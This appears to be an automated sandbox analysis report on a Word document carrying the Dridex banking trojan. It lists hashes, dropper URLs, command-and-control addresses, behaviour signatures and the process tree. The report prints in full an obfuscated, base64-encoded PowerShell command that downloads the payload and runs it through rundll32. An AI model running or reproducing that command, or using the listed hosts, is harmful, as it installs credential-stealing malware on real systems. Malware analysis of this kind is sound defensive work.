Analysis

  • max time kernel
    80s
  • max time network
    82s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    26-11-2020 07:48

General

  • Target

    Order_Gift_Card_411022863.doc

  • Size

    112KB

  • MD5

    07faf71908158870c1e1af97bd89d12d

  • SHA1

    567052f0b8b453932db3e18208990bca12bcc167

  • SHA256

    255327cc966eebcdb52f94414c36920585f2190ae10a9560db5047def717b2ac

  • SHA512

    3acc7099c87cfb54abf823b00839a3c928ae853cf6c83c19bc29a79af4fca45a573f88ac4b60f83698aed718b443d0ec3ac130954b5d0fb71e239b76da6e414d

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://burstner.clabris.se/ucjk7st.zip

exe.dropper

http://bespokeweddings.ie/k1c8dh4.rar

exe.dropper

https://conjurosdeamoryhechiceriaacacio.com/tjbdhdvi1.zip

exe.dropper

https://keitauniv.keita.ae/wchfvdsd7.rar

exe.dropper

https://cms.keita.ae/h0mqrz.rar

exe.dropper

https://airbornegroup.net/y461xrm.zip

exe.dropper

https://phones.pmrspain.com/xzeoxn8.rar

exe.dropper

http://oya.qa/lfonl5.rar

Extracted

Family

dridex

Botnet

10555

C2

194.225.58.216:443

178.254.40.132:691

216.172.165.70:3889

198.57.200.100:3786

rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Dridex Loader 1 IoCs

    Detects Dridex both x86 and x64 loader in memory.

  • Blocklisted process makes network request 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Order_Gift_Card_411022863.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1032
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD JAAwADYAVAAgAD0AIAAgAFsAVAB5AHAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiACAALQBGACcAZQBtAC4AaQBvAC4ARABpAHIARQBDACcALAAnAHMAWQBTAHQAJwAsACcAUgBZACcALAAnAFQATwAnACkAOwAgACQAOQB5AGUASAA1AE0AIAA9AFsAdAB5AFAARQBdACgAIgB7ADUAfQB7ADkAfQB7ADMAfQB7ADIAfQB7ADcAfQB7ADQAfQB7ADAAfQB7ADgAfQB7ADEAfQB7ADYAfQAiACAALQBGACAAJwBPAEkAbgBUACcALAAnAEUAJwAsACcALgBuAEUAVAAuAHMARQAnACwAJwBzAFQAZQBNACcALAAnAGkAQwBFAFAAJwAsACcAcwAnACwAJwBSACcALAAnAFIAdgAnACwAJwBNAEEATgBBAEcAJwAsACcAWQAnACkAOwAkAFQAcAA5AHEAdgByAHAAPQAoACgAJwBDAGYAJwArACcAZgAnACkAKwAnAGUAZgAnACsAJwAyAG8AJwApADsAJABIAGgAYgBuAHEAZQBrAD0AJABKADAAeQAxAGsAbgBmACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABBAGUAZQAwADIAMwA3ADsAJABHAHEAeABiAGgANQBnAD0AKAAoACcAVQBfACcAKwAnAGEAJwApACsAJwB2ADYAJwArACcAZwBtACcAKQA7ACAAKAAgAEcAYwBpACAAIAAoACcAVgBhAHIAJwArACcASQBBAEIAbABFACcAKwAnADoAMAA2AFQAJwApACAAIAApAC4AVgBhAGwAdQBlADoAOgAiAEMAYABSAEUAYQBgAFQAYABlAEQASQByAEUAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAzACcAKwAnAFQATAAnACkAKwAoACcAWgBoACcAKwAnAG8AZAAxACcAKQArACgAJwBhACcAKwAnAGwAMwBUACcAKQArACgAJwBMAE4ANwAnACsAJwB6ACcAKwAnADgAcQAnACkAKwAnADMAJwArACgAJwA5ADMAVAAnACsAJwBMACcAKQApAC4AIgBSAEUAYABwAEwAYABBAGMAZQAiACgAKAAnADMAJwArACcAVABMACcAKQAsAFsAUwB0AFIAaQBuAGcAXQBbAGMASABBAHIAXQA5ADIAKQApACkAOwAkAE0AaQB1AHIAZQBpAGsAPQAoACgAJwBHADEAcQAnACsAJwBxAG4AJwApACsAJwByAHkAJwApADsAIAAkADkAeQBlAEgANQBNADoAOgAiAHMARQBDAHUAUgBgAEkAYABUAHkAcAByAE8AYABUAG8AYABjAE8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzADEAJwApACsAJwAyACcAKQA7ACQARwB3ADcAMQBlAG0AagA9ACgAKAAnAFUAJwArACcAZgA5ACcAKQArACgAJwBsAG0AdQAnACsAJwBuACcAKQApADsAJABHAGwAeAB4ADUAcAB5ACAAPQAgACgAKAAnAFUAbgByACcAKwAnAHQAaAAnACsAJwBwACcAKQArACcAcABhACcAKwAnAGYAJwApADsAJABVAHMAbgAxAGYAbABtAD0AKAAoACcASQAnACsAJwBpAGsAeAB4ACcAKQArACcAZgAwACcAKQA7ACQAUgAwAGsAXwBiADEAbQA9ACgAKAAnAFIAXwAnACsAJwBfACcAKQArACgAJwBlAGUANgAnACsAJwBoACcAKQApADsAJABQAHgAegB4ADgAegByAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AWgBoAG8AZAAxAGEAbAB7ADAAJwArACcAfQBOADcAegAnACsAJwA4AHEAMwA5AHsAJwArACcAMAB9ACcAKQAtAGYAIAAgAFsAYwBIAGEAUgBdADkAMgApACsAJABHAGwAeAB4ADUAcAB5ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABPADcAdgAzAGYAYwBhAD0AKAAnAFoAeQAnACsAKAAnAGkAZQB0ACcAKwAnAGYAMgAnACkAKQA7ACQAUwB4ADEAagB1AGUAbwA9AE4AZQBgAHcALQBvAGIAYABqAGUAYwB0ACAAbgBlAHQALgBXAGUAYgBjAGwAaQBFAE4AVAA7ACQARwBoAGsAZwAzAGgAZQA9ACgAKAAoACcAaAB0AHQAcABzACcAKwAnADoAJwApACsAJwBLACcAKwAnACkAJwArACgAKAAnACgAbQAnACsAJwBiADEAKQAoAEsAJwApACkAKwAnACkAJwArACcAKAAnACsAKAAnAG0AYgAnACsAJwAxACcAKQArACgAKAAnACkAKAAnACkAKQArACgAJwBiAHUAJwArACcAcgAnACkAKwAnAHMAJwArACgAJwB0AG4AJwArACcAZQAnACkAKwAoACcAcgAnACsAJwAuAGMAJwApACsAKAAnAGwAYQBiAHIAaQBzACcAKwAnAC4AJwArACcAcwBlACcAKwAnAEsAJwApACsAKAAoACcAKQAoACcAKQApACsAJwBtAGIAJwArACcAMQAnACsAKAAoACcAKQAoACcAKQApACsAKAAnAHUAYwBqAGsAJwArACcANwBzAHQALgAnACkAKwAoACcAegBpAHAAJwArACcAQAAnACkAKwAoACcAaAB0ACcAKwAnAHQAcAA6ACcAKQArACgAKAAnAEsAKQAnACkAKQArACgAKAAnACgAbQAnACsAJwBiADEAJwApACkAKwAoACgAJwApACgASwApACgAJwArACcAbQAnACsAJwBiADEAKQAnACsAJwAoAGIAZQAnACkAKQArACcAcwAnACsAJwBwACcAKwAoACcAbwAnACsAJwBrAGUAJwApACsAKAAnAHcAZQBkACcAKwAnAGQAJwApACsAJwBpAG4AJwArACgAJwBnAHMAJwArACcALgAnACkAKwAnAGkAJwArACgAKAAnAGUASwApACgAJwArACcAbQAnACkAKQArACcAYgAnACsAKAAoACcAMQAnACsAJwApACgAJwApACkAKwAoACcAawAnACsAJwAxAGMAOABkAGgAJwApACsAJwA0ACcAKwAoACcALgByACcAKwAnAGEAJwApACsAKAAnAHIAQABoAHQAdAAnACsAJwBwACcAKQArACgAKAAnAHMAJwArACcAOgBLACkAKABtACcAKwAnAGIAMQAnACsAJwApACgASwApACcAKQApACsAKAAoACcAKABtAGIAMQAnACsAJwApACgAJwArACcAYwBvACcAKQApACsAKAAnAG4AagAnACsAJwB1AHIAJwApACsAKAAnAG8AcwAnACsAJwBkAGUAYQAnACkAKwAoACcAbQBvACcAKwAnAHIAJwApACsAKAAnAHkAaAAnACsAJwBlAGMAJwApACsAKAAnAGgAaQAnACsAJwBjAGUAcgBpAGEAJwApACsAJwBhACcAKwAoACgAJwBjAGEAYwAnACsAJwBpAG8ALgBjAG8AJwArACcAbQBLACcAKwAnACkAJwApACkAKwAoACgAJwAoAG0AJwArACcAYgAxACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAHQAagAnACkAKQArACgAJwBiACcAKwAnAGQAaABkAHYAaQAnACsAJwAxAC4AJwApACsAKAAnAHoAaQBwACcAKwAnAEAAaAAnACkAKwAoACgAJwB0AHQAcABzACcAKwAnADoASwApACgAbQAnACsAJwBiACcAKQApACsAKAAoACcAMQApACcAKwAnACgASwAnACsAJwApACgAbQAnACkAKQArACcAYgAnACsAKAAoACcAMQApACcAKQApACsAKAAoACcAKABrACcAKwAnAGUAaQB0ACcAKQApACsAKAAnAGEAJwArACcAdQBuAGkAdgAuACcAKwAnAGsAZQAnACkAKwAoACcAaQB0ACcAKwAnAGEAJwApACsAKAAnAC4AYQAnACsAJwBlAEsAJwApACsAKAAoACcAKQAoAG0AJwArACcAYgAxACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAYwBoAGYAJwApACkAKwAoACcAdgBkAHMAJwArACcAZAAnACkAKwAnADcALgAnACsAJwByACcAKwAnAGEAJwArACcAcgAnACsAJwBAACcAKwAoACcAaAB0AHQAJwArACcAcAAnACkAKwAnAHMAJwArACgAKAAnADoASwAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwBtAGIAMQApACgAJwApACkAKwAnAEsAJwArACgAKAAnACkAKABtACcAKwAnAGIAMQApACcAKwAnACgAYwAnACkAKQArACcAbQAnACsAKAAnAHMALgBrACcAKwAnAGUAaQB0AGEAJwApACsAJwAuAGEAJwArACgAKAAnAGUAJwArACcASwApACgAbQBiADEAKQAoACcAKwAnAGgAJwArACcAMABtACcAKQApACsAKAAnAHEAcgAnACsAJwB6ACcAKQArACgAJwAuACcAKwAnAHIAYQAnACkAKwAnAHIAJwArACcAQAAnACsAJwBoACcAKwAoACgAJwB0AHQAcAAnACsAJwBzADoASwApACcAKwAnACgAbQBiADEAJwApACkAKwAoACgAJwApACgASwApACgAJwArACcAbQBiACcAKwAnADEAKQAoACcAKwAnAGEAJwApACkAKwAoACcAaQByACcAKwAnAGIAJwApACsAJwBvACcAKwAoACcAcgAnACsAJwBuAGUAZwAnACkAKwAnAHIAJwArACgAJwBvAHUAJwArACcAcAAnACkAKwAnAC4AJwArACcAbgAnACsAJwBlACcAKwAnAHQAJwArACgAKAAnAEsAKQAnACkAKQArACgAKAAnACgAbQAnACsAJwBiACcAKQApACsAJwAxACcAKwAoACgAJwApACgAeQA0ACcAKwAnADYAJwApACkAKwAnADEAeAAnACsAKAAnAHIAJwArACcAbQAuACcAKQArACcAegBpACcAKwAoACcAcABAACcAKwAnAGgAdAAnACkAKwAnAHQAJwArACcAcAAnACsAJwBzADoAJwArACgAKAAnAEsAKQAoACcAKwAnAG0AJwApACkAKwAnAGIAMQAnACsAKAAoACcAKQAoAEsAJwArACcAKQAoAG0AJwApACkAKwAoACgAJwBiADEAJwArACcAKQAoAHAAaAAnACsAJwBvACcAKwAnAG4AZQBzACcAKQApACsAJwAuAHAAJwArACgAJwBtAHIAcwBwAGEAJwArACcAaQAnACkAKwAnAG4AJwArACgAKAAnAC4AYwBvAG0ASwApACgAJwArACcAbQBiADEAKQAoAHgAegAnACsAJwBlACcAKwAnAG8AeAAnACkAKQArACcAbgA4ACcAKwAnAC4AJwArACcAcgBhACcAKwAnAHIAJwArACgAJwBAACcAKwAnAGgAdAB0AHAAOgAnACkAKwAnAEsAJwArACcAKQAnACsAKAAoACcAKAAnACsAJwBtAGIAJwApACkAKwAoACgAJwAxACkAKABLACkAKABtAGIAJwArACcAMQAnACsAJwApACgAJwArACcAbwAnACkAKQArACcAeQAnACsAKAAoACcAYQAuAHEAYQBLACcAKwAnACkAJwApACkAKwAoACgAJwAoAG0AYgAxACkAJwArACcAKAAnACkAKQArACgAJwBsAGYAbwAnACsAJwBuAGwANQAuAHIAJwApACsAJwBhAHIAJwApACkALgAiAFIAYABFAGAAUABsAGEAYwBFACIAKAAoACgAKAAoACcASwAnACsAJwApACgAJwApACkAKwAoACgAJwBtAGIAJwArACcAMQApACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBzAGAAcABsAGkAVAAiACgAJABPAGcAMgByADEAZwBpACAAKwAgACQASABoAGIAbgBxAGUAawAgACsAIAAkAEUAMgBiAGYAbABoAHUAKQA7ACQAQQBxAGQAMgB1AGgANgA9ACgAJwBZAHoAJwArACcAXwBuACcAKwAoACcAcgAnACsAJwBoAGQAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYAMgByAHAAbQBnAGUAIABpAG4AIAAkAEcAaABrAGcAMwBoAGUAIAB8ACAAUwBvAFIAdABgAC0ATwBiAGoAZQBgAGMAVAAgAHsAZwBlAGAAVAAtAHIAYABBAGAATgBkAE8ATQB9ACkAewB0AHIAeQB7ACQAUwB4ADEAagB1AGUAbwAuACIARABgAG8AVwBuAGwAYABvAEEAYABkAEYAaQBMAGUAIgAoACQAVgAyAHIAcABtAGcAZQAsACAAJABQAHgAegB4ADgAegByACkAOwAkAEcAeQB2ADkAZAAyAGUAPQAoACcAUQBzACcAKwAoACcAdwBwACcAKwAnAGIANgAnACkAKwAnAGwAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFAAeAB6AHgAOAB6AHIAKQAuACIAbABFAG4AYABnAFQAaAAiACAALQBnAGUAIAA0ADUANwA5ADIAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZABsAGwAMwAnACsAJwAyAC4AZQAnACsAJwB4AGUAJwApACAAJABQAHgAegB4ADgAegByACwAMAA7ACQAVABkAGQAYwBfADMAbQA9ACgAKAAnAEQAdABiACcAKwAnAGcANgAnACkAKwAnAHcAJwArACcAMAAnACkAOwBiAHIAZQBhAGsAOwAkAE4AOQB5AHcAeABvAGsAPQAoACcAUwAnACsAKAAnAGQAYwAnACsAJwB3AHEAdgBjACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABGAGsAMgBlAF8AcgBpAD0AKAAoACcARwB4ACcAKwAnAF8AJwApACsAKAAnAGkAJwArACcAYwBnADQAJwApACkA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD JAAwADYAVAAgAD0AIAAgAFsAVAB5AHAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiACAALQBGACcAZQBtAC4AaQBvAC4ARABpAHIARQBDACcALAAnAHMAWQBTAHQAJwAsACcAUgBZACcALAAnAFQATwAnACkAOwAgACQAOQB5AGUASAA1AE0AIAA9AFsAdAB5AFAARQBdACgAIgB7ADUAfQB7ADkAfQB7ADMAfQB7ADIAfQB7ADcAfQB7ADQAfQB7ADAAfQB7ADgAfQB7ADEAfQB7ADYAfQAiACAALQBGACAAJwBPAEkAbgBUACcALAAnAEUAJwAsACcALgBuAEUAVAAuAHMARQAnACwAJwBzAFQAZQBNACcALAAnAGkAQwBFAFAAJwAsACcAcwAnACwAJwBSACcALAAnAFIAdgAnACwAJwBNAEEATgBBAEcAJwAsACcAWQAnACkAOwAkAFQAcAA5AHEAdgByAHAAPQAoACgAJwBDAGYAJwArACcAZgAnACkAKwAnAGUAZgAnACsAJwAyAG8AJwApADsAJABIAGgAYgBuAHEAZQBrAD0AJABKADAAeQAxAGsAbgBmACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABBAGUAZQAwADIAMwA3ADsAJABHAHEAeABiAGgANQBnAD0AKAAoACcAVQBfACcAKwAnAGEAJwApACsAJwB2ADYAJwArACcAZwBtACcAKQA7ACAAKAAgAEcAYwBpACAAIAAoACcAVgBhAHIAJwArACcASQBBAEIAbABFACcAKwAnADoAMAA2AFQAJwApACAAIAApAC4AVgBhAGwAdQBlADoAOgAiAEMAYABSAEUAYQBgAFQAYABlAEQASQByAEUAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAzACcAKwAnAFQATAAnACkAKwAoACcAWgBoACcAKwAnAG8AZAAxACcAKQArACgAJwBhACcAKwAnAGwAMwBUACcAKQArACgAJwBMAE4ANwAnACsAJwB6ACcAKwAnADgAcQAnACkAKwAnADMAJwArACgAJwA5ADMAVAAnACsAJwBMACcAKQApAC4AIgBSAEUAYABwAEwAYABBAGMAZQAiACgAKAAnADMAJwArACcAVABMACcAKQAsAFsAUwB0AFIAaQBuAGcAXQBbAGMASABBAHIAXQA5ADIAKQApACkAOwAkAE0AaQB1AHIAZQBpAGsAPQAoACgAJwBHADEAcQAnACsAJwBxAG4AJwApACsAJwByAHkAJwApADsAIAAkADkAeQBlAEgANQBNADoAOgAiAHMARQBDAHUAUgBgAEkAYABUAHkAcAByAE8AYABUAG8AYABjAE8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzADEAJwApACsAJwAyACcAKQA7ACQARwB3ADcAMQBlAG0AagA9ACgAKAAnAFUAJwArACcAZgA5ACcAKQArACgAJwBsAG0AdQAnACsAJwBuACcAKQApADsAJABHAGwAeAB4ADUAcAB5ACAAPQAgACgAKAAnAFUAbgByACcAKwAnAHQAaAAnACsAJwBwACcAKQArACcAcABhACcAKwAnAGYAJwApADsAJABVAHMAbgAxAGYAbABtAD0AKAAoACcASQAnACsAJwBpAGsAeAB4ACcAKQArACcAZgAwACcAKQA7ACQAUgAwAGsAXwBiADEAbQA9ACgAKAAnAFIAXwAnACsAJwBfACcAKQArACgAJwBlAGUANgAnACsAJwBoACcAKQApADsAJABQAHgAegB4ADgAegByAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AWgBoAG8AZAAxAGEAbAB7ADAAJwArACcAfQBOADcAegAnACsAJwA4AHEAMwA5AHsAJwArACcAMAB9ACcAKQAtAGYAIAAgAFsAYwBIAGEAUgBdADkAMgApACsAJABHAGwAeAB4ADUAcAB5ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABPADcAdgAzAGYAYwBhAD0AKAAnAFoAeQAnACsAKAAnAGkAZQB0ACcAKwAnAGYAMgAnACkAKQA7ACQAUwB4ADEAagB1AGUAbwA9AE4AZQBgAHcALQBvAGIAYABqAGUAYwB0ACAAbgBlAHQALgBXAGUAYgBjAGwAaQBFAE4AVAA7ACQARwBoAGsAZwAzAGgAZQA9ACgAKAAoACcAaAB0AHQAcABzACcAKwAnADoAJwApACsAJwBLACcAKwAnACkAJwArACgAKAAnACgAbQAnACsAJwBiADEAKQAoAEsAJwApACkAKwAnACkAJwArACcAKAAnACsAKAAnAG0AYgAnACsAJwAxACcAKQArACgAKAAnACkAKAAnACkAKQArACgAJwBiAHUAJwArACcAcgAnACkAKwAnAHMAJwArACgAJwB0AG4AJwArACcAZQAnACkAKwAoACcAcgAnACsAJwAuAGMAJwApACsAKAAnAGwAYQBiAHIAaQBzACcAKwAnAC4AJwArACcAcwBlACcAKwAnAEsAJwApACsAKAAoACcAKQAoACcAKQApACsAJwBtAGIAJwArACcAMQAnACsAKAAoACcAKQAoACcAKQApACsAKAAnAHUAYwBqAGsAJwArACcANwBzAHQALgAnACkAKwAoACcAegBpAHAAJwArACcAQAAnACkAKwAoACcAaAB0ACcAKwAnAHQAcAA6ACcAKQArACgAKAAnAEsAKQAnACkAKQArACgAKAAnACgAbQAnACsAJwBiADEAJwApACkAKwAoACgAJwApACgASwApACgAJwArACcAbQAnACsAJwBiADEAKQAnACsAJwAoAGIAZQAnACkAKQArACcAcwAnACsAJwBwACcAKwAoACcAbwAnACsAJwBrAGUAJwApACsAKAAnAHcAZQBkACcAKwAnAGQAJwApACsAJwBpAG4AJwArACgAJwBnAHMAJwArACcALgAnACkAKwAnAGkAJwArACgAKAAnAGUASwApACgAJwArACcAbQAnACkAKQArACcAYgAnACsAKAAoACcAMQAnACsAJwApACgAJwApACkAKwAoACcAawAnACsAJwAxAGMAOABkAGgAJwApACsAJwA0ACcAKwAoACcALgByACcAKwAnAGEAJwApACsAKAAnAHIAQABoAHQAdAAnACsAJwBwACcAKQArACgAKAAnAHMAJwArACcAOgBLACkAKABtACcAKwAnAGIAMQAnACsAJwApACgASwApACcAKQApACsAKAAoACcAKABtAGIAMQAnACsAJwApACgAJwArACcAYwBvACcAKQApACsAKAAnAG4AagAnACsAJwB1AHIAJwApACsAKAAnAG8AcwAnACsAJwBkAGUAYQAnACkAKwAoACcAbQBvACcAKwAnAHIAJwApACsAKAAnAHkAaAAnACsAJwBlAGMAJwApACsAKAAnAGgAaQAnACsAJwBjAGUAcgBpAGEAJwApACsAJwBhACcAKwAoACgAJwBjAGEAYwAnACsAJwBpAG8ALgBjAG8AJwArACcAbQBLACcAKwAnACkAJwApACkAKwAoACgAJwAoAG0AJwArACcAYgAxACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAHQAagAnACkAKQArACgAJwBiACcAKwAnAGQAaABkAHYAaQAnACsAJwAxAC4AJwApACsAKAAnAHoAaQBwACcAKwAnAEAAaAAnACkAKwAoACgAJwB0AHQAcABzACcAKwAnADoASwApACgAbQAnACsAJwBiACcAKQApACsAKAAoACcAMQApACcAKwAnACgASwAnACsAJwApACgAbQAnACkAKQArACcAYgAnACsAKAAoACcAMQApACcAKQApACsAKAAoACcAKABrACcAKwAnAGUAaQB0ACcAKQApACsAKAAnAGEAJwArACcAdQBuAGkAdgAuACcAKwAnAGsAZQAnACkAKwAoACcAaQB0ACcAKwAnAGEAJwApACsAKAAnAC4AYQAnACsAJwBlAEsAJwApACsAKAAoACcAKQAoAG0AJwArACcAYgAxACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAYwBoAGYAJwApACkAKwAoACcAdgBkAHMAJwArACcAZAAnACkAKwAnADcALgAnACsAJwByACcAKwAnAGEAJwArACcAcgAnACsAJwBAACcAKwAoACcAaAB0AHQAJwArACcAcAAnACkAKwAnAHMAJwArACgAKAAnADoASwAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwBtAGIAMQApACgAJwApACkAKwAnAEsAJwArACgAKAAnACkAKABtACcAKwAnAGIAMQApACcAKwAnACgAYwAnACkAKQArACcAbQAnACsAKAAnAHMALgBrACcAKwAnAGUAaQB0AGEAJwApACsAJwAuAGEAJwArACgAKAAnAGUAJwArACcASwApACgAbQBiADEAKQAoACcAKwAnAGgAJwArACcAMABtACcAKQApACsAKAAnAHEAcgAnACsAJwB6ACcAKQArACgAJwAuACcAKwAnAHIAYQAnACkAKwAnAHIAJwArACcAQAAnACsAJwBoACcAKwAoACgAJwB0AHQAcAAnACsAJwBzADoASwApACcAKwAnACgAbQBiADEAJwApACkAKwAoACgAJwApACgASwApACgAJwArACcAbQBiACcAKwAnADEAKQAoACcAKwAnAGEAJwApACkAKwAoACcAaQByACcAKwAnAGIAJwApACsAJwBvACcAKwAoACcAcgAnACsAJwBuAGUAZwAnACkAKwAnAHIAJwArACgAJwBvAHUAJwArACcAcAAnACkAKwAnAC4AJwArACcAbgAnACsAJwBlACcAKwAnAHQAJwArACgAKAAnAEsAKQAnACkAKQArACgAKAAnACgAbQAnACsAJwBiACcAKQApACsAJwAxACcAKwAoACgAJwApACgAeQA0ACcAKwAnADYAJwApACkAKwAnADEAeAAnACsAKAAnAHIAJwArACcAbQAuACcAKQArACcAegBpACcAKwAoACcAcABAACcAKwAnAGgAdAAnACkAKwAnAHQAJwArACcAcAAnACsAJwBzADoAJwArACgAKAAnAEsAKQAoACcAKwAnAG0AJwApACkAKwAnAGIAMQAnACsAKAAoACcAKQAoAEsAJwArACcAKQAoAG0AJwApACkAKwAoACgAJwBiADEAJwArACcAKQAoAHAAaAAnACsAJwBvACcAKwAnAG4AZQBzACcAKQApACsAJwAuAHAAJwArACgAJwBtAHIAcwBwAGEAJwArACcAaQAnACkAKwAnAG4AJwArACgAKAAnAC4AYwBvAG0ASwApACgAJwArACcAbQBiADEAKQAoAHgAegAnACsAJwBlACcAKwAnAG8AeAAnACkAKQArACcAbgA4ACcAKwAnAC4AJwArACcAcgBhACcAKwAnAHIAJwArACgAJwBAACcAKwAnAGgAdAB0AHAAOgAnACkAKwAnAEsAJwArACcAKQAnACsAKAAoACcAKAAnACsAJwBtAGIAJwApACkAKwAoACgAJwAxACkAKABLACkAKABtAGIAJwArACcAMQAnACsAJwApACgAJwArACcAbwAnACkAKQArACcAeQAnACsAKAAoACcAYQAuAHEAYQBLACcAKwAnACkAJwApACkAKwAoACgAJwAoAG0AYgAxACkAJwArACcAKAAnACkAKQArACgAJwBsAGYAbwAnACsAJwBuAGwANQAuAHIAJwApACsAJwBhAHIAJwApACkALgAiAFIAYABFAGAAUABsAGEAYwBFACIAKAAoACgAKAAoACcASwAnACsAJwApACgAJwApACkAKwAoACgAJwBtAGIAJwArACcAMQApACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBzAGAAcABsAGkAVAAiACgAJABPAGcAMgByADEAZwBpACAAKwAgACQASABoAGIAbgBxAGUAawAgACsAIAAkAEUAMgBiAGYAbABoAHUAKQA7ACQAQQBxAGQAMgB1AGgANgA9ACgAJwBZAHoAJwArACcAXwBuACcAKwAoACcAcgAnACsAJwBoAGQAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYAMgByAHAAbQBnAGUAIABpAG4AIAAkAEcAaABrAGcAMwBoAGUAIAB8ACAAUwBvAFIAdABgAC0ATwBiAGoAZQBgAGMAVAAgAHsAZwBlAGAAVAAtAHIAYABBAGAATgBkAE8ATQB9ACkAewB0AHIAeQB7ACQAUwB4ADEAagB1AGUAbwAuACIARABgAG8AVwBuAGwAYABvAEEAYABkAEYAaQBMAGUAIgAoACQAVgAyAHIAcABtAGcAZQAsACAAJABQAHgAegB4ADgAegByACkAOwAkAEcAeQB2ADkAZAAyAGUAPQAoACcAUQBzACcAKwAoACcAdwBwACcAKwAnAGIANgAnACkAKwAnAGwAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFAAeAB6AHgAOAB6AHIAKQAuACIAbABFAG4AYABnAFQAaAAiACAALQBnAGUAIAA0ADUANwA5ADIAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZABsAGwAMwAnACsAJwAyAC4AZQAnACsAJwB4AGUAJwApACAAJABQAHgAegB4ADgAegByACwAMAA7ACQAVABkAGQAYwBfADMAbQA9ACgAKAAnAEQAdABiACcAKwAnAGcANgAnACkAKwAnAHcAJwArACcAMAAnACkAOwBiAHIAZQBhAGsAOwAkAE4AOQB5AHcAeABvAGsAPQAoACcAUwAnACsAKAAnAGQAYwAnACsAJwB3AHEAdgBjACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABGAGsAMgBlAF8AcgBpAD0AKAAoACcARwB4ACcAKwAnAF8AJwApACsAKAAnAGkAJwArACcAYwBnADQAJwApACkA
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1456
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Zhod1al\N7z8q39\Unrthppaf.dll 0
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1836
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Zhod1al\N7z8q39\Unrthppaf.dll 0
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Checks whether UAC is enabled
            PID:1888

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Zhod1al\N7z8q39\Unrthppaf.dll
      MD5

      2b47214db606e21fb5d58cc7c3a27242

      SHA1

      8b71bd0a2618d26a16a85245e7a92aef6d3da967

      SHA256

      b12b65a39a6261016b7473cfd08c316cee6958739e00bb746331bdfb52b4b0bb

      SHA512

